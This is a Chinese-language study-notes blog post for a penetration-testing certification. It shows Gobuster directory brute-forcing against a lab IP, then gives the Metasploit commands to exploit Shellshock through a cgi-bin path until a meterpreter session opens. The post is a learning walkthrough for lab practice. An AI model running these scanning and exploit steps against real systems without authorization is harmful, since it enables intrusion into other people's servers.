iT邦幫忙

2023 iThome 鐵人賽

DAY 11
0
Security

滲透測試小白的 CPENT 證照學習筆記系列 第 11

Gobuster 網站目錄爆破工具

  • 分享至 

  • xImage
  •  

Gobuster 是一個用於網站目錄和文件掃描的開源安全工具。通常用於測試網站的安全性,特別是尋找隱藏的頁面、目錄或文件,以檢查是否存在潛在的安全漏洞或敏感信息。

  • 安裝 Gobuster 工具
    sudo apt install gobuster

  • 掃描目標網站
    gobuster dir –-url http://192.168.0.24/ –-wordlist /usr/share/wordlists/dirb/common.txt

    • dir:使用目錄掃描的模式。
    • --url:設定要掃描的目標網站URL,即 http://192.168.0.24/
    • --wordlist:設定字典檔的路徑,Gobuster 會使用這個字典來進行字典攻擊。
      image.png
  • 找可疑的漏洞
    image.png

  • 如果掃出了一個 cgi-bin 資料夾,可以聯想到一個弱點  shellshock,可以用 metasploit 工具來爆破看看。
    msfconsole
    search shellshock
    use exploit/multi/http/apache_mod_cgi_bash_env_exec
    show options
    set RHOSTS 192.168.0.24
    set RPORT 80
    set TARGETURI /cgi-bin/keygen

    image.png
    出現 meterpreter > 即破解成功,可以再作後續的利用。


上一篇
用 Binwalk 解析二進制檔案
下一篇
ProxyChains 實現應用代理
系列文
滲透測試小白的 CPENT 證照學習筆記30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言